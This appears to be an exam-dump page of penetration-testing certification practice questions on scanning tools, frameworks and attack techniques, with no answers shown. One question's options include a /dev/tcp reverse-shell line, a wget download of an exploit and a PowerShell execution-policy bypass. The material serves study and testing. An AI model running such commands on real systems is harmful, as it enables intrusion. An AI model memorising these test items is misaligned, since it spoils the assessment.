Weekend Sale - Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: sntaclus

examout.co

A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:

    Have a full TCP connection

    Send a “hello” payload

    Walt for a response

    Send a string of characters longer than 16 bytes

Which of the following approaches would BEST support the objective?

A.

Run nmap –Pn –sV –script vuln .

B.

Employ an OpenVAS simple scan against the TCP port of the host.

C.

Create a script in the Lua language and use it with NSE.

D.

Perform a credentialed scan with Nessus.

A penetration tester is explaining the MITRE ATT&CK framework to a company’s chief legal counsel.

Which of the following would the tester MOST likely describe as a benefit of the framework?

A.

Understanding the tactics of a security intrusion can help disrupt them.

B.

Scripts that are part of the framework can be imported directly into SIEM tools.

C.

The methodology can be used to estimate the cost of an incident better.

D.

The framework is static and ensures stability of a security program overtime.

A compliance-based penetration test is primarily concerned with:

A.

obtaining Pll from the protected network.

B.

bypassing protection on edge devices.

C.

determining the efficacy of a specific set of security standards.

D.

obtaining specific information from the protected network.

A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company’s privacy policy. Which of the following would be the BEST to use to find vulnerabilities on this server?

A.

OpenVAS

B.

Nikto

C.

SQLmap

D.

Nessus

A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?

A.

Aircrack-ng

B.

Wireshark

C.

Wifite

D.

Kismet

A penetration tester has been given eight business hours to gain access to a client’s financial system. Which of the following techniques will have the highest likelihood of success?

A.

Attempting to tailgate an employee going into the client's workplace

B.

Dropping a malicious USB key with the company’s logo in the parking lot

C.

Using a brute-force attack against the external perimeter to gain a foothold

D.

Performing spear phishing against employees by posing as senior management

You are a penetration tester reviewing a client’s website through a web browser.

INSTRUCTIONS

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

A penetration tester ran the following command on a staging server:

python –m SimpleHTTPServer 9891

Which of the following commands could be used to download a file named exploit to a target machine for execution?

A.

nc 10.10.51.50 9891 < exploit

B.

powershell –exec bypass –f \\10.10.51.50\9891

C.

bash –i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit

D.

wget 10.10.51.50:9891/exploit

An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems.

Which of the following is the penetration tester trying to accomplish?

A.

Uncover potential criminal activity based on the evidence gathered.

B.

Identify all the vulnerabilities in the environment.

C.

Limit invasiveness based on scope.

D.

Maintain confidentiality of the findings.

A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible.

Which of the following Nmap scan syntaxes would BEST accomplish this objective?

A.

nmap -sT -vvv -O 192.168.1.2/24 -PO

B.

nmap -sV 192.168.1.2/24 -PO

C.

nmap -sA -v -O 192.168.1.2/24

D.

nmap -sS -O 192.168.1.2/24 -T1